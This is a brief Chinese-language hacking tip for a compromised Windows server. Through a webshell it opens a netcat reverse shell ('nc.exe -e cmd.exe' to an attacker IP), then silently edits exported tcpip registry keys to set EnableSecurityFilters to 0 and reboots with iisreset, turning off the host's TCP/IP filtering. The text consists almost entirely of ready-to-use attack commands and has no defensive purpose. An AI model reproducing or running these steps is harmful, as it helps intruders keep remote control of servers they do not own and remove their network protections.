解除TCP/IP限制的小技巧

1.用nc反弹得到一个shell 

本机监听 nc -l -p 32 

webshell运行： 

x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port" 

得到一个shell 

2.cmd下导出注册表文件 
c:\>regedit -e x:\xxx\1.reg hkey_local_machine\system\controlset001\ser 
vices\tcpip 

c:\>regedit -e x:\xxx\2.reg hkey_local_machine\system\controlset002\services\tcpip 

c:\>regedit -e x:\xxx\3.reg hkey_local_machine\system\currentcontrolset\services\tcpip 

修改各文件 enablesecurityfilters 处 
将最后的1改为0 

3.将注册表文件导入 
x:\xxx>regedit -s 1.reg 
x:\xxx>regedit -s 2.reg 
x:\xxx>regedit -s 3.reg 
-s 为无提示 

重启命令 iisreset /reboot 

完成tcp/ip筛选限制